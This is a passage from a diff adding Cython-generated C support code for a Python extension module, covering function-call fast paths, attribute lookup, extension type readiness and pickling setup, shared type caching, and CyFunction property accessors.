PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* GetAttr */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *o, PyObject *n) { +#if CYTHON_USE_TYPE_SLOTS +#if PY_MAJOR_VERSION >= 3 + if (likely(PyUnicode_Check(n))) +#else + if (likely(PyString_Check(n))) +#endif + return __Pyx_PyObject_GetAttrStr(o, n); +#endif + return PyObject_GetAttr(o, n); +} + +/* HasAttr */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *o, PyObject *n) { + PyObject *r; + if (unlikely(!__Pyx_PyBaseString_Check(n))) { + PyErr_SetString(PyExc_TypeError, + "hasattr(): attribute name must be string"); + return -1; + } + r = __Pyx_GetAttr(o, n); + if (!r) { + PyErr_Clear(); + return 0; + } else { + Py_DECREF(r); + return 1; + } +} + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* PyObjectCallNoArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* ValidateBasesTuple */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ +static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* PyObject_GenericGetAttrNoDict */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* SetupReduce */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject 